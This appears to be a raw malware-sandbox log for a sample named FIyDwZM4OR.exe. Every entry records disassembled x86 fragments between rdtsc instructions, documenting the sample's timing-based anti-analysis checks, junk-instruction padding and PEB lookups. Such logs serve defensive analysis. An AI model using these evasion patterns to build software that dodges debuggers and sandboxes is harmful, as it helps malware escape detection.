Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1808280 second address: 1808292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FEA75194B50h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18098BD second address: 18098E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FEA75199F77h 0x0000000c je 00007FEA75199F6Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 180B32A second address: 180B32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 180B32E second address: 180B339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 180B339 second address: 180B340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1805E58 second address: 1805E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1805E5C second address: 1805E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1805E62 second address: 1805E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jc 00007FEA75199F66h 0x0000000d jnl 00007FEA75199F66h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1805E76 second address: 1805E80 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA75194B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 181877E second address: 1818797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F74h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1818797 second address: 18187C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FEA75194B4Ch 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FEA75194B58h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E5574 second address: 18E5590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F78h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E5590 second address: 18E559E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FEA75194B46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E559E second address: 18E55A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E5704 second address: 18E5708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E586A second address: 18E5870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E602C second address: 18E6045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f jg 00007FEA75194B46h 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E6045 second address: 18E604A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E8BD6 second address: 18E8BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E8BDC second address: 18E8BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E8C94 second address: 18E8C9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E8C9E second address: 18E8CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E8CA2 second address: 18E8CC1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA75194B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA75194B51h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E8E9F second address: 18E8EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F72h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E91DA second address: 18E91E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18E91E0 second address: 18E91E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18EC167 second address: 18EC16D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18EC16D second address: 18EC177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEA75199F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18EDD93 second address: 18EDDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B50h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18EDDAA second address: 18EDDC8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA75199F6Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FEA75199F66h 0x00000010 jc 00007FEA75199F66h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18EDDC8 second address: 18EDDCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714000C second address: 7140030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov dh, 27h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEA75199F74h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140030 second address: 7140034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140034 second address: 714003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714003A second address: 714007E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 pushfd 0x00000007 jmp 00007FEA75194B58h 0x0000000c add esi, 72073A18h 0x00000012 jmp 00007FEA75194B4Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FEA75194B4Bh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714007E second address: 714009B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714009B second address: 71400B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 mov dl, ch 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEA75194B4Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71400B6 second address: 71400BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71400BC second address: 71400C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71400C0 second address: 714011E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx ebx, si 0x0000000e call 00007FEA75199F70h 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 popad 0x00000017 mov eax, dword ptr fs:[00000030h] 0x0000001d jmp 00007FEA75199F77h 0x00000022 sub esp, 18h 0x00000025 jmp 00007FEA75199F76h 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714011E second address: 714014B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FEA75194B53h 0x0000000a jmp 00007FEA75194B53h 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714014B second address: 7140195 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop edx 0x0000000f pushfd 0x00000010 jmp 00007FEA75199F76h 0x00000015 sbb ah, 00000018h 0x00000018 jmp 00007FEA75199F6Bh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140195 second address: 71401AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75194B54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71401AD second address: 71401B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71401B1 second address: 71401E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FEA75194B58h 0x00000012 sub eax, 043251D8h 0x00000018 jmp 00007FEA75194B4Bh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71401E9 second address: 71402AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b pushad 0x0000000c mov ecx, ebx 0x0000000e pushfd 0x0000000f jmp 00007FEA75199F6Fh 0x00000014 and al, 0000004Eh 0x00000017 jmp 00007FEA75199F79h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, esi 0x0000001f jmp 00007FEA75199F6Eh 0x00000024 push eax 0x00000025 pushad 0x00000026 mov edi, 3CAC8674h 0x0000002b mov dx, 95E0h 0x0000002f popad 0x00000030 xchg eax, esi 0x00000031 jmp 00007FEA75199F6Fh 0x00000036 mov esi, dword ptr [74E806ECh] 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FEA75199F74h 0x00000043 sbb esi, 58F39B58h 0x00000049 jmp 00007FEA75199F6Bh 0x0000004e popfd 0x0000004f mov bx, si 0x00000052 popad 0x00000053 test esi, esi 0x00000055 pushad 0x00000056 call 00007FEA75199F70h 0x0000005b call 00007FEA75199F72h 0x00000060 pop eax 0x00000061 pop edi 0x00000062 push eax 0x00000063 push edx 0x00000064 mov ebx, ecx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71402AD second address: 71402B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71402B1 second address: 714031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007FEA7519AD12h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FEA75199F74h 0x00000014 xor cx, FF48h 0x00000019 jmp 00007FEA75199F6Bh 0x0000001e popfd 0x0000001f call 00007FEA75199F78h 0x00000024 movzx eax, bx 0x00000027 pop ebx 0x00000028 popad 0x00000029 xchg eax, edi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FEA75199F79h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714031E second address: 714032E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75194B4Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714032E second address: 7140332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140332 second address: 7140350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FEA75194B4Eh 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140350 second address: 7140356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140356 second address: 714037A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [74E50B60h] 0x0000000f mov eax, 750BE5E0h 0x00000014 ret 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714037A second address: 714037E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714037E second address: 714039B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714039B second address: 71403D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA75199F77h 0x00000009 or ch, 0000006Eh 0x0000000c jmp 00007FEA75199F79h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71403D5 second address: 71403E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000044h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edx, si 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71403E6 second address: 71403EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71403EB second address: 71403F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71403F1 second address: 71403F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71403F5 second address: 714049C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f pushfd 0x00000010 jmp 00007FEA75194B50h 0x00000015 xor ax, DD78h 0x0000001a jmp 00007FEA75194B4Bh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 pushad 0x00000023 mov esi, 5C9F84CBh 0x00000028 mov dx, cx 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov ch, dh 0x00000030 pushad 0x00000031 mov eax, 7ECC0731h 0x00000036 jmp 00007FEA75194B4Eh 0x0000003b popad 0x0000003c popad 0x0000003d xchg eax, edi 0x0000003e jmp 00007FEA75194B50h 0x00000043 push dword ptr [eax] 0x00000045 jmp 00007FEA75194B50h 0x0000004a mov eax, dword ptr fs:[00000030h] 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FEA75194B57h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714049C second address: 71404C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, EDh 0x00000005 jmp 00007FEA75199F70h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [eax+18h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, bx 0x00000016 mov bx, FA3Ch 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71404C2 second address: 71404D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75194B51h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71404FA second address: 71404FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71404FE second address: 7140504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140504 second address: 7140541 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c push esi 0x0000000d movsx edx, ax 0x00000010 pop eax 0x00000011 pushfd 0x00000012 jmp 00007FEA75199F6Dh 0x00000017 sbb si, 8656h 0x0000001c jmp 00007FEA75199F71h 0x00000021 popfd 0x00000022 popad 0x00000023 test esi, esi 0x00000025 pushad 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140541 second address: 7140589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 je 00007FEAE2E53CA4h 0x0000000f pushad 0x00000010 call 00007FEA75194B57h 0x00000015 mov ebx, ecx 0x00000017 pop eax 0x00000018 mov ax, dx 0x0000001b popad 0x0000001c mov eax, 00000000h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FEA75194B53h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140589 second address: 71405C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA75199F78h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71405C4 second address: 71405D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71405D3 second address: 71405F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov dh, 4Dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007FEA75199F6Fh 0x00000016 pop eax 0x00000017 mov dh, CDh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140728 second address: 7140774 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+20h], eax 0x0000000c jmp 00007FEA75194B50h 0x00000011 mov eax, dword ptr [ebx+60h] 0x00000014 jmp 00007FEA75194B50h 0x00000019 mov dword ptr [esi+24h], eax 0x0000001c pushad 0x0000001d mov edx, ecx 0x0000001f mov edx, ecx 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+64h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140774 second address: 7140778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140778 second address: 714077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714077E second address: 71407E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c pushad 0x0000000d jmp 00007FEA75199F6Eh 0x00000012 push esi 0x00000013 call 00007FEA75199F71h 0x00000018 pop ecx 0x00000019 pop edx 0x0000001a popad 0x0000001b mov eax, dword ptr [ebx+68h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov edx, 3029C64Ch 0x00000026 jmp 00007FEA75199F75h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71407E2 second address: 7140805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, 35h 0x00000011 mov ecx, 4825516Bh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140805 second address: 714080B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714080B second address: 714080F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714080F second address: 7140813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714090C second address: 7140910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140910 second address: 7140914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140914 second address: 714091A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
